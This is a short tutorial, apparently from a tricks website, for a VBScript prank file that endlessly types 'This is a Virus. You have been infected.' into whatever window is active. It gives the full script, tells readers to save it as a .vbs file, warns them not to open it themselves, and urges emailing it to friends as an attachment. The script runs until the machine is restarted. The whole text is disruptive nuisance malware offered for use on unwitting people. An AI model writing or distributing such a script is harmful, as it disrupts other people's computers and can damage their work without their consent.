MAKE YOUR KEYBOARD TYPE (ANY) MESSAGE CONTINUOUSLY-VBS TRICK
This VBS trick can make any of your friend's keyboard type any message continuously.
1- Open Notepad, copy the code .
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "This is a Virus. You have been infected."
loop
2 - save the file as enjoy.vbs or *.vbs
Dont open this File on your computer
if you open this your computer
You might need to restart your computer to stop this.
Send this file to your friends as an email attachment to see the fun.